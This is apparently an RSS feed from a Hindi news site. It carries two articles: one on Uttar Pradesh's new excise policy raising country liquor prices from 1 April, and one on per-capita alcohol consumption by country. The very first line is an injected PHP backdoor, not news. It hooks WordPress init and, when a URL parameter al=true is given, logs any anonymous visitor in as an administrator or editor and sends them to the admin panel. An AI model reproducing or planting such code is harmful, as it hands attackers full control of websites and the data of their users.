// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); alcohol – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sat, 14 Feb 2026 03:35:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 Desi Alcohol Price Hike: यूपी में 1 अप्रैल से देशी शराब के दाम में ₹5 की बढ़ोतरी https://pratyushaashakinayikiran.com/?p=197701 Sat, 14 Feb 2026 03:35:00 +0000 https://pratyushaashakinayikiran.com/?p=197701 लखनऊ
 यूपी कैबिनेट ने प्रदेश की नई आबकारी नीति को मंजूरी दे दी है. 1 अप्रैल से यूपी में देसी शराब के दाम बढ़ जाएंगे. देसी शराब के दाम में लगभग 5 रुपए बढ़ेंगे. 36% अल्कोहल वाली देसी शराब 165 से बढ़कर 173 रुपए की हो जाएगी. अन्य किस्म की शराब के दामों में कोई संशोधन नहीं हुआ. यूपी सरकार ने 2026-27 के लिए आबकारी को 71,278 करोड़ का राजस्व लक्ष्य दिया है.

वहीं शहरी क्षेत्र में दुकानों का देसी शराब का कोटा घटेगा. शराब की फुटकर दुकानों का आवंटन ई-लॉटरी के माध्यम से होगा. अंग्रेजी शराब की फुटकर दुकानों की लाइसेंस फीस 7.5% बढ़ाई गई है. नोएडा, गाजियाबाद, आगरा, प्रयागराज, वाराणसी और लखनऊ में लो अल्कोहलिक स्ट्रैंथ बेवरेज बियर, वाइन और आरटीडी के बाहर लाइसेंस मिल सकेंगे. यूपी में निर्मित शराब और आबकारी के अन्य उत्पादों को विदेश में भी निर्यात होगा.

इसके अलावा यूपी में एक अप्रैल से नई नीति लागू होने के बाद अंग्रेजी शराब 10 से 30 रुपये तक महंगी हो जाएगी. देशी शराब के यह दाम प्रति बोतल के हिसाब से बढ़े हैं, इसी आधार पर हाफ क्वॉर्टर और बच्चा की रेट में भी बढ़ोत्तरी हुई है. यानी कोटा 7.5 फीसदी बढ़ा है और 7.5 फीसदी ही लाइसेंस शुल्क भी बढ़ा है. 7.5 फीसदी की यही बढ़ोतरी अंग्रेजी शराब की तरह बीयर पर भी लागू होगी. एक अप्रैल से लागू होने वाली नई आबकारी नीति में कई नए प्रावधान किए गए है. कोटेदारों (अनुज्ञापी) को राहत देने वाली इस नीति में पहली बार देसी शराब में 100 एमएल का मिनिएचर ‘बच्चा’ उतारा गया. 42.8 डिग्री तीव्रता वाला यह ‘बच्चा’ बाजार में 50 रुपये का बिकेगा.

 

]]>
दुनिया में शराब की प्रति व्यक्ति सबसे ज्यादा खपत मोल्दोवा में सालभर में हर आदमी गटक जाता है 15 लीटर से अधिक शराब https://pratyushaashakinayikiran.com/?p=74913 Wed, 25 Sep 2024 09:45:00 +0000 https://pratyushaashakinayikiran.com/?p=74913 नई दिल्ली
 मोल्दोवा को यूरोप का सबसे गरीब देश माना जाता है। इस देश में जीडीपी पर कैपिटा करीब 4,500 डॉलर है। लेकिन प्रति व्यक्ति शराब खपत के मामले में इस देश का पूरी दुनिया में पहला नंबर है। पूर्वी यूरोप का यह देश किसी जमाने में सोवियत संघ का हिस्सा हुआ करता था। इसका क्षेत्रफल 33,846 वर्ग किमी और आबादी करीब 25 लाख है। इस देश में प्रति व्यक्ति शराब की सालाना खपत 15.2 लीटर है जो दुनिया में सबसे ज्यादा है। विश्व स्वास्थ्य संगठन के आंकड़ों में यह बात सामने आई है।

प्रति व्यक्ति शराब की खपत के मामले में लिथुआनिया दूसरे नंबर पर है। इस देश में हर वयस्क आदमी सालभर में 15 लीटर शराब गटक जाता है। चेक गणराज्य में प्रति व्यक्ति शराब की सालाना खपत 14.4 लीटर, सेशेल्स में 13.8 लीटर, जर्मनी में 13.4 लीटर, नाइजीरिया मे 13.4 लीटर, लात्विया में 12.9 लीटर, बुल्गारिया में 12.7 लीटर, फ्रांस में 12.6 लीटर और पुर्तगाल में 12.3 लीटर है। इसके बाद बेल्जियम, रूस, ऑस्ट्रिया, एस्तोनिया, पोलैंड, स्विट्जरलैंड, यूके, उरुग्वे, फिनलैंड, ऑस्ट्रेलिया, डेनमार्क, ग्रीस, साउथ कोरिया और स्पेन का नंबर है। इन देशों में शराब की प्रति व्यक्ति सालाना खपत 10 लीटर से ज्यादा है।

भारत का हाल

अर्जेंटीना, अमेरिका, चिली, साउथ अफ्रीका, स्वीडन, आइसलैंड, कनाडा, नीदरलैंड, यूक्रेन, थाईलैंड, जापान, ब्राजील, कजाकस्तान, इटली, नॉर्वे, चाइना, कंबोडिया, फिलीपींस, मेक्सिको और कोलंबिया में हर एडल्ट आदमी सालाना औसतन पांच लीटर से ज्यादा शराब पी जाता है। भारत में यह 5.7 लीटर है। इस लिस्ट में सबसे नीचे इस्लामी देश हैं। कुवैत में शराब की खपत जीरो है। सऊदी अरब में प्रति व्यक्ति शराब की सालाना खपत 0.2 लीटर है जबकि पाकिस्तान में 0.3 लीटर। मिस्र में यह 0.4 लीटर, नाइजर में 0.5 लीटर, इंडोनेशिया में 0.8 लीटर, ईरान में 1 लीटर, तुर्की में दो लीटर, सिंगापुर में 2.5 लीटर, यूएई में 3.8 लीटर, नॉर्थ कोरिया में 3.9 लीटर और वेनेजुएला में 5.6 लीटर है।

]]>